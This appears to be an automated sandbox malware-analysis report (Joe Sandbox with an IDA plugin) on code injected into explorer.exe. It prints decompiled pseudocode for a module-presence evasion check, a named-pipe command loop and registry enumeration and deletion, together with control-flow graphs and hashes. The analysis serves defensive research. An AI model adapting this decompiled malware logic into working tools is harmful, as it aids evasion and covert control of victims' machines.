call 885d5 call 8a911 call 8861a 265->282 278->201 282->278 283->234 289 8511f-85171 call 8109a call 8902d call 860df 283->289 303 85173-851d1 call 89640 call 885d5 call 8a911 289->303 304 851e5-851f2 call 8861a 289->304 312 851d6-851e2 call 8861a 303->312 304->234 312->304
                            C-Code - Quality: 70%
                            			E00084D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				void* _t120;
				signed int _t122;
				intOrPtr _t123;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x9e688; // 0xb0000
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t120 = E0008B7A8(0x9b9c8,  &_v516); // executed
					_t14 = _t120 + 1; // 0x1
					E0008A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E0008A471( &_v556, _t298);
					 *0x9e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						_t123 = E0008E1BC(0x9b9cc, _t299); // executed
						 *0x9e680 = _t123;
						 *_t337 = 0x610;
						_t124 = E000895E1(0x9b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x9e688; // 0xb0000
						_t127 = E000892E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E000885D5( &_v612);
						_t130 = E0008B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E0008861A( &_v616, 0xfffffffe);
						_t133 =  *0x9e688; // 0xb0000
						_t22 = _t133 + 0x114; // 0xb0114
						E00084A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x9e688; // 0xb0000
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x9e680; // 0x286fdb0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
							}
							_v620 = _v620 & 0x00000000;
							E0008E2C6(_t353,  &_v576); // executed
							_pop(_t262);
							_t142 =  *0x9e6b4; // 0x286fa98
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E0008E2C6(_t353,  &_v588);
								_t235 =  *0x9e6b4; // 0x286fa98
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x9e73c;
							if( *0x9e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x9e680; // 0x286fdb0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x9e688; // 0xb0000
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E000849A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x9e684; // 0x286f8f0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x9e688; // 0xb0000
											_t184 = E0008FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0); // executed
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E00088604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E0008109A(_t262, 0x148);
													_t305 =  *0x9e688; // 0xb0000
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E0008902D(_t271,  &_v572);
													_t272 =  *0x9e688; // 0xb0000
													_t188 = E000860DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x9e688; // 0xb0000
														__eflags = _t200 + 0x1020;
														E00089640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E000885D5( &_v636);
														E0008A911(_t333, 0, 0xbb8, 1); // executed
														E0008861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E0008861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E000849A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x9e684; // 0x286f8f0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E00088604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E000895E1(_t278, 0x32d);
										_t280 =  *0x9e688; // 0xb0000
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E00089640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E000885D5( &_v636);
										E0008A911(_t249, 0, 0xbb8, 1);
										E0008861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E000895E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x9e688; // 0xb0000
								_t329 = E000892E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E0008B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x9e684; // 0x286f8f0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E0008861A( &_v612, 0xfffffffe);
								}
								E000885D5( &_v616);
								_t150 =  *0x9e688; // 0xb0000
								lstrcpynW(_t150 + 0x438,  *0x9e740, 0x105);
								_t153 =  *0x9e688; // 0xb0000
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x9e738, 0x105);
								_t331 =  *0x9e688; // 0xb0000
								_t117 = _t331 + 0x228; // 0xb0228
								 *((intOrPtr*)(_t331 + 0x434)) = E00088FBE(_t117, __eflags);
								E0008861A(0x9e740, 0xfffffffe);
								E0008861A(0x9e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E000895C7(0x6e2);
				_v616 = _t250;
				_t326 = E000895C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E000885C2( &_v616);
					_t122 = E000885C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}




















































































                            0x00084d6d
                            0x00084d73
                            0x00084d79
                            0x00084d7e
                            0x00084d8c
                            0x00084d8f
                            0x00084dee
                            0x00084df7
                            0x00084e00
                            0x00084e03
                            0x00084e0a
                            0x00084e0f
                            0x00084e14
                            0x00084e1b
                            0x00084e25
                            0x00084e2c
                            0x00084e32
                            0x00084e37
                            0x00084e3c
                            0x00084e43
                            0x00084e49
                            0x00084e4b
                            0x00084e4c
                            0x00084e50
                            0x00084e5b
                            0x00084e60
                            0x00084e69
                            0x00084e6e
                            0x00084e76
                            0x00084e7d
                            0x00084e7e
                            0x00084e80
                            0x00084e9c
                            0x00084e9f
                            0x00084e9f
                            0x00084ea8
                            0x00084ead
                            0x00084ebd
                            0x00084ec5
                            0x00084eca
                            0x00084ed0
                            0x00084ed3
                            0x00084ed9
                            0x00084ef8
                            0x00084efe
                            0x00084eff
                            0x00084f00
                            0x00084f01
                            0x00084f02
                            0x00084f03
                            0x00084f0d
                            0x00084f11
                            0x00084f16
                            0x00084f19
                            0x00084f1b
                            0x00084f2d
                            0x00084f2d
                            0x00084f2f
                            0x00084f3b
                            0x00084f40
                            0x00084f46
                            0x00084f4f
                            0x00084f52
                            0x00084f54
                            0x00084f5f
                            0x00084f64
                            0x00084f69
                            0x00084f6e
                            0x00084f6e
                            0x00084f71
                            0x00084f78
                            0x00000000
                            0x00084f7e
                            0x00084f7e
                            0x00084f83
                            0x00084f87
                            0x00084f89
                            0x00084f8c
                            0x00084f8e
                            0x00084f94
                            0x00084f94
                            0x00084f8e
                            0x00084f96
                            0x00084f9b
                            0x00084fa1
                            0x00084fa3
                            0x00000000
                            0x00084fa9
                            0x00084fa9
                            0x00084fad
                            0x00085082
                            0x00085088
                            0x0008508e
                            0x00085099
                            0x0008509a
                            0x0008509b
                            0x0008509c
                            0x000850a2
                            0x000850a7
                            0x000850ad
                            0x000850b5
                            0x000850bb
                            0x000850be
                            0x000850cd
                            0x000850d4
                            0x000850d7
                            0x000850e4
                            0x000850e8
                            0x000850f5
                            0x000850fa
                            0x000850fd
                            0x000850ff
                            0x00085110
                            0x00085112
                            0x00085116
                            0x00085117
                            0x00085119
                            0x00085124
                            0x00085129
                            0x00085136
                            0x0008513a
                            0x0008513b
                            0x0008513d
                            0x00085145
                            0x00085146
                            0x0008514b
                            0x00085163
                            0x00085168
                            0x0008516b
                            0x0008516f
                            0x00085171
                            0x00085184
                            0x0008518e
                            0x00085192
                            0x0008519a
                            0x0008519b
                            0x000851a3
                            0x000851a4
                            0x000851a9
                            0x000851b5
                            0x000851bf
                            0x000851d1
                            0x000851dd
                            0x000851e2
                            0x000851e2
                            0x000851ec
                            0x000851f2
                            0x000851f2
                            0x00085119
                            0x000850ff
                            0x00000000
                            0x00085088
                            0x00084fb3
                            0x00084fb6
                            0x00000000
                            0x00000000
                            0x00084fbc
                            0x00084fc7
                            0x00084fc8
                            0x00084fc9
                            0x00084fca
                            0x00084fd0
                            0x00084fd5
                            0x00084fe9
                            0x00084fee
                            0x00084ff2
                            0x00084ffd
                            0x00085006
                            0x00085008
                            0x0008500c
                            0x0008500d
                            0x0008500f
                            0x0008501a
                            0x00085020
                            0x00085032
                            0x00085035
                            0x00085038
                            0x00085045
                            0x0008504d
                            0x00085057
                            0x00085069
                            0x00085075
                            0x0008507a
                            0x00000000
                            0x0008500f
                            0x00084fa3
                            0x00084edb
                            0x00084edb
                            0x00084ee1
                            0x00084ee3
                            0x00000000
                            0x00000000
                            0x00084ee5
                            0x00084ee9
                            0x000851f3
                            0x000851f8
                            0x000851fe
                            0x00085200
                            0x00085201
                            0x00085205
                            0x00085215
                            0x0008521a
                            0x0008521e
                            0x00085220
                            0x00085224
                            0x00085229
                            0x0008522b
                            0x0008522d
                            0x00085233
                            0x00085233
                            0x00085240
                            0x00085246
                            0x0008524c
                            0x00085251
                            0x0008526f
                            0x00085271
                            0x0008527d
                            0x0008527d
                            0x00085283
                            0x00085285
                            0x0008528b
                            0x0008529d
                            0x000852a3
                            0x000852af
                            0x000852b7
                            0x000852b7
                            0x000852b7
                            0x000852b9
                            0x000852bf
                            0x000852bf
                            0x00084eef
                            0x00084ef2
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00084ef2
                            0x00084ed9
                            0x00084e1d
                            0x00084e1d
                            0x00000000
                            0x00084e1d
                            0x00084d9b
                            0x00084da2
                            0x00084dab
                            0x00084dad
                            0x00084db3
                            0x00084dc4
                            0x00084dcd
                            0x00084dcd
                            0x00084dd9
                            0x00084de2
                            0x00084de7
                            0x00084dec
                            0x00000000
                            0x00000000
                            0x00084dec

                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00084DC0
                            • GetModuleHandleA.KERNEL32(00000000), ref: 00084DC7
                            • lstrcpynW.KERNEL32(000AFBC8,00000105), ref: 0008526F
                            • lstrcpynW.KERNEL32(000AFDD8,00000105), ref: 00085283
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleModulelstrcpyn
                            • String ID:
                            • API String ID: 3430401031-0
                            • Opcode ID: ba1a0e27262ffeeef705cd697bedfda52239be39da119351be4a621040f75d7a
                            • Instruction ID: 161cbc9eeedcce8db67ccaa0b8f26abb365355608c06558398d668d8ddb63534
                            • Opcode Fuzzy Hash: ba1a0e27262ffeeef705cd697bedfda52239be39da119351be4a621040f75d7a
                            • Instruction Fuzzy Hash: 64E1AE71608341AFE750FF64DC86FAA73E9BB98314F04092AF584DB2D2EB74D9448B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000832A1, Relevance: 6.2, APIs: 4, Instructions: 189pipeCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 315 832a1-832b4 316 832b7-832ce ConnectNamedPipe 315->316 317 832d0-832db GetLastError 316->317 318 832e1-83304 316->318 317->318 319 834c2-834c8 317->319 321 834a8 GetLastError 318->321 322 8330a-8330e 318->322 323 834ae-834bc DisconnectNamedPipe 321->323 322->321 324 83314-83320 322->324 323->316 323->319 325 833b8-833d1 call 893be 324->325 326 83326-83329 324->326 335 83476-8349b call 896ca 325->335 336 833d7-833dd 325->336 328 8332b-8332f 326->328 329 83397-833b3 call 8c319 326->329 332 8337b-83384 call 8f79f 328->332 333 83331-83334 328->333 329->323 352 83358-8335b 332->352 338 83365-83369 call 8f79f 333->338 339 83336-83339 333->339 355 8349d-834a6 call 8c319 335->355 341 833df-833f6 call 88604 336->341 342 83454-8346f call 89749 call 81da0 336->342 350 8336e-83376 338->350 345 8333b-8333e 339->345 346 8334f-83353 call 8f7c1 339->346 363 833f8-833fd 341->363 364 83471 341->364 342->335 345->323 353 83344-8334d call 8f7c1 345->353 346->352 350->355 356 8335d-83363 352->356 357 83386-83388 352->357 353->350 355->323 362 8338a-83392 call 8c319 356->362 357->362 362->323 367 8342a-83452 call 89749 call 81da0 call 894b7 363->367 368 833ff-83402 363->368 371 83473 364->371 367->371 373 83404-83425 call 8c379 call 891a6 368->373 371->335 383 83427 373->383 383->367
                            C-Code - Quality: 54%
                            			E000832A1() {
				char _v8;
				struct _OVERLAPPED* _v12;
				struct _OVERLAPPED* _v16;
				intOrPtr* _v20;
				char _v24;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr* _v40;
				char _v168;
				char _v172;
				intOrPtr _t41;
				void* _t47;
				char _t54;
				char _t61;
				intOrPtr _t64;
				void* _t65;
				void* _t68;
				void* _t70;
				void* _t72;
				void* _t76;
				struct _OVERLAPPED* _t82;
				intOrPtr* _t83;
				signed int _t84;
				signed short* _t86;
				intOrPtr* _t97;
				signed short* _t105;
				void* _t107;
				void* _t108;
				void* _t109;
				intOrPtr* _t112;
				struct _OVERLAPPED* _t113;
				char _t114;
				void* _t115;

				_t113 = 0;
				_t82 = 0;
				_v8 = 0;
				_v12 = 0;
				while(1) {
					_v16 = _t113;
					if(ConnectNamedPipe( *0x9e674, _t113) == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(_t113);
					_push( &_v16);
					_t41 =  *0x9e684; // 0x286f8f0
					_push(0x80000);
					_push( *0x9e724);
					_push( *0x9e674);
					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
						GetLastError();
					} else {
						_t86 =  *0x9e724; // 0x2870020
						_t47 = ( *_t86 & 0x0000ffff) - 1;
						if(_t47 == 0) {
							_t112 = E000893BE( &(_t86[4]), 0x20, 1,  &_v24);
							_v40 = _t112;
							if(_t112 != 0) {
								_t114 = _v24;
								if(_t114 <= 1) {
									_t113 = 0;
									_t54 = E00081DA0(E00089749( *_t112), 0, 0, 0);
									_t115 = _t115 + 0x10;
									_v172 = _t54;
								} else {
									_v36 = _t114 - 1;
									_t83 = E00088604(_t114 - 1 << 2);
									_v32 = _t83;
									if(_t83 == 0) {
										_t113 = 0;
									} else {
										if(_t114 > 1) {
											_v20 = _t83;
											_t84 = 1;
											do {
												_t64 = E000891A6( *((intOrPtr*)(_t112 + _t84 * 4)), E0008C379( *((intOrPtr*)(_t112 + _t84 * 4))));
												_t97 = _v20;
												_t84 = _t84 + 1;
												 *_t97 = _t64;
												_v20 = _t97 + 4;
											} while (_t84 < _t114);
											_t83 = _v32;
										}
										_t113 = 0;
										_t61 = E00081DA0(E00089749( *_t112), _t83, _v36, 0);
										_t115 = _t115 + 0x10;
										_v172 = _t61;
										E000894B7( &_v24);
									}
									_t82 = _v12;
								}
							}
							_t105 =  *0x9e724; // 0x2870020
							E000896CA( &_v168,  &(_t105[4]), 0x80);
							_push(0x84);
							_push( &_v172);
							_push(2);
							goto L33;
						} else {
							_t65 = _t47 - 3;
							if(_t65 == 0) {
								_push(_t113);
								_push(_t113);
								_t108 = 5;
								E0008C319(_t108);
								 *0x9e758 = 1;
								_t82 = 1;
								_v12 = 1;
							} else {
								_t68 = _t65;
								if(_t68 == 0) {
									_t70 = E0008F79F( &_v8);
									goto L13;
								} else {
									_t72 = _t68 - 1;
									if(_t72 == 0) {
										E0008F79F( &_v8);
										goto L16;
									} else {
										_t76 = _t72 - 1;
										if(_t76 == 0) {
											_t70 = E0008F7C1( &_v8);
											L13:
											if(_t70 == 0) {
												_push(_t113);
												_push(_t113);
												_push(0xa);
											} else {
												_push(_v8);
												_push(_t70);
												_push(5);
											}
											_pop(_t109);
											E0008C319(_t109);
										} else {
											if(_t76 == 1) {
												E0008F7C1( &_v8);
												L16:
												_push(4);
												_push( &_v8);
												_push(5);
												L33:
												_pop(_t107);
												E0008C319(_t107);
												_t115 = _t115 + 0xc;
											}
										}
									}
								}
							}
						}
					}
					DisconnectNamedPipe( *0x9e674);
					if(_t82 == 0) {
						continue;
					}
					break;
				}
				return 0;
			}




































                            0x000832ac
                            0x000832ae
                            0x000832b0
                            0x000832b4
                            0x000832b7
                            0x000832c3
                            0x000832ce
                            0x00000000
                            0x00000000
                            0x000832e1
                            0x000832e5
                            0x000832e6
                            0x000832eb
                            0x000832f0
                            0x000832f6
                            0x00083304
                            0x000834a8
                            0x00083314
                            0x00083314
                            0x0008331d
                            0x00083320
                            0x000833c8
                            0x000833ca
                            0x000833d1
                            0x000833d7
                            0x000833dd
                            0x00083456
                            0x00083461
                            0x00083466
                            0x00083469
                            0x000833df
                            0x000833e2
                            0x000833ee
                            0x000833f0
                            0x000833f6
                            0x00083471
                            0x000833f8
                            0x000833fd
                            0x000833ff
                            0x00083402
                            0x00083404
                            0x00083412
                            0x00083417
                            0x0008341a
                            0x0008341b
                            0x00083420
                            0x00083423
                            0x00083427
                            0x00083427
                            0x0008342c
                            0x00083439
                            0x0008343e
                            0x00083441
                            0x0008344d
                            0x0008344d
                            0x00083473
                            0x00083473
                            0x000833dd
                            0x00083476
                            0x0008348a
                            0x0008348f
                            0x0008349a
                            0x0008349b
                            0x00000000
                            0x00083326
                            0x00083326
                            0x00083329
                            0x00083397
                            0x00083398
                            0x0008339b
                            0x0008339c
                            0x000833a3
                            0x000833ae
                            0x000833b0
                            0x0008332b
                            0x0008332c
                            0x0008332f
                            0x0008337f
                            0x00000000
                            0x00083331
                            0x00083331
                            0x00083334
                            0x00083369
                            0x00000000
                            0x00083336
                            0x00083336
                            0x00083339
                            0x00083353
                            0x00083358
                            0x0008335b
                            0x00083386
                            0x00083387
                            0x00083388
                            0x0008335d
                            0x0008335d
                            0x00083360
                            0x00083361
                            0x00083361
                            0x0008338a
                            0x0008338b
                            0x0008333b
                            0x0008333e
                            0x00083348
                            0x0008336e
                            0x0008336e
                            0x00083373
                            0x00083374
                            0x0008349d
                            0x0008349d
                            0x0008349e
                            0x000834a3
                            0x000834a3
                            0x0008333e
                            0x00083339
                            0x00083334
                            0x0008332f
                            0x00083329
                            0x00083320
                            0x000834b4
                            0x000834bc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x000834bc
                            0x000834c8

                            APIs
                            • ConnectNamedPipe.KERNELBASE(00000000), ref: 000832C6
                            • GetLastError.KERNEL32 ref: 000832D0
                              • Part of subcall function 0008C319: FlushFileBuffers.KERNEL32(00000214), ref: 0008C35F
                            • DisconnectNamedPipe.KERNEL32 ref: 000834B4
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
                            • String ID:
                            • API String ID: 2389948835-0
                            • Opcode ID: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
                            • Instruction ID: aec34d1c461da35ce7ea10a51bd790cfc71f6dd0dd97058cb51a1121444265f8
                            • Opcode Fuzzy Hash: 86978b340c489adfd94372cf0304dc1e2843ab24a0898238353e600af01e772a
                            • Instruction Fuzzy Hash: 4151E472A00215ABEB61FFA4DC89AEEBBB8FF45750F104026F584A6151DB749B44CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 000861B4, Relevance: 6.1, APIs: 4, Instructions: 145registryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 385 861b4-861f9 memset call 88604 388 861ff-86211 call 88604 385->388 389 86363-86369 385->389 388->389 392 86217-86234 RegOpenKeyExW 388->392 393 8623a-8626d 392->393 394 86333-86337 392->394 400 8627f-86284 393->400 401 8626f-8627a 393->401 395 86339-8633e 394->395 396 86344-8635b call 8861a * 2 394->396 395->396 404 86360 396->404 400->394 403 8628a 400->403 401->394 406 8628d-862dc memset * 2 403->406 404->389 408 862de-862ee 406->408 409 86326-8632d 406->409 411 862f0-86304 408->411 412 86323 408->412 409->394 409->406 411->412 414 86306-86313 call 8c392 411->414 412->409 417 8631c-8631e call 8b1b1 414->417 418 86315-86317 414->418 417->412 418->417
                            C-Code - Quality: 80%
                            			E000861B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				intOrPtr _t63;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t98 = E00088604(0x3fff);
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E00088604(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						_t63 =  *0x9e68c; // 0x286fab8
						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
					}
					E0008861A( &_v32, 0x3fff); // executed
					E0008861A( &_v36, 0x800); // executed
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0x9e68c; // 0x286fab8
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						memset(_t97, 0, 0x800);
						memset(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0x9e68c; // 0x286fab8
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0x9e690; // 0x286fb90
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0x9e68c; // 0x286fab8
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E0008C392(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E0008B1B1(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0x9e68c; // 0x286fab8
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}
































                            0x000861b4
                            0x000861b4
                            0x000861c0
                            0x000861cf
                            0x000861d2
                            0x000861dc
                            0x000861e4
                            0x000861e7
                            0x000861ef
                            0x000861f1
                            0x000861f4
                            0x000861f9
                            0x00086365
                            0x00086369
                            0x00086369
                            0x00086209
                            0x0008620b
                            0x00086211
                            0x00000000
                            0x00000000
                            0x00086234
                            0x00086333
                            0x00086337
                            0x00086339
                            0x00086341
                            0x00086341
                            0x0008634d
                            0x0008635b
                            0x00000000
                            0x00086360
                            0x0008623d
                            0x00086241
                            0x00086245
                            0x00086249
                            0x0008624d
                            0x0008624e
                            0x0008624f
                            0x00086250
                            0x00086251
                            0x00086255
                            0x0008625c
                            0x0008625d
                            0x00086262
                            0x0008626d
                            0x00086282
                            0x00086284
                            0x00000000
                            0x00000000
                            0x0008628a
                            0x0008628d
                            0x00086295
                            0x000862a2
                            0x000862a7
                            0x000862aa
                            0x000862b3
                            0x000862ba
                            0x000862ca
                            0x000862d4
                            0x000862da
                            0x000862dc
                            0x000862e1
                            0x000862ea
                            0x000862ec
                            0x000862ee
                            0x000862f0
                            0x000862fa
                            0x00086300
                            0x00086304
                            0x00086308
                            0x0008630d
                            0x00086313
                            0x00086315
                            0x00086317
                            0x00086317
                            0x0008631e
                            0x0008631e
                            0x00086304
                            0x00086323
                            0x00086323
